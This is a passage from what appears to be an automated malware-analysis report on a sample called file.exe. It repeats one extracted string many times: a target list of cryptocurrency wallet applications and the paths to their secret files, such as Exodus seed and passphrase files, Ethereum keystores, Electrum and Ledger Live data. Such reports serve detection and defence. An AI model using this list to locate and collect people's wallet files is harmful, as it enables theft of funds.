Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local 